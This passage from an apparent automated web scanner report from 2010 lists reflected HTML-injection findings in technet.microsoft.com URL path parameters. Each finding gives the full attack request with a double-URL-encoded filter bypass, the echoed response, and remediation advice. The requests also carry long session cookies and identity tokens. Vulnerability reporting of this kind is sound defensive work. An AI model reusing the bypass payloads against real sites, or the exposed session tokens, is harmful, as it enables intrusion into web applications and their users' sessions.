GET /en-us12f8c%2522%253e%253ca%253e77dc383cfad/library/bb727169.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:54 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us12f8c"><a>77dc383cfad/library/bb727169" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dde0%2522%253e%253ca%253ebebfe93a9eb was submitted in the REST URL parameter 2. This input was echoed as 2dde0"><a>bebfe93a9eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2dde0%2522%253e%253ca%253ebebfe93a9eb/bb727169.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:02 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2dde0"><a>bebfe93a9eb/bb727169" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b19a%2522%253e%253ca%253e7b99dd35ffe was submitted in the REST URL parameter 3. This input was echoed as 6b19a"><a>7b99dd35ffe in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727169.aspx6b19a%2522%253e%253ca%253e7b99dd35ffe HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:09 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727169.aspx6b19a"><a>7b99dd35ffe" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 468aa%2522%253e%253ca%253e16313fd53ac was submitted in the REST URL parameter 1. This input was echoed as 468aa"><a>16313fd53ac in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us468aa%2522%253e%253ca%253e16313fd53ac/library/bb742437.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:20:45 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us468aa"><a>16313fd53ac/library/bb742437" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 148c8%2522%253e%253ca%253e87400f70296 was submitted in the REST URL parameter 2. This input was echoed as 148c8"><a>87400f70296 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library148c8%2522%253e%253ca%253e87400f70296/bb742437.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:21:38 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library148c8"><a>87400f70296/bb742437" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0703%2522%253e%253ca%253e705b67e6431 was submitted in the REST URL parameter 3. This input was echoed as b0703"><a>705b67e6431 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742437.aspxb0703%2522%253e%253ca%253e705b67e6431 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
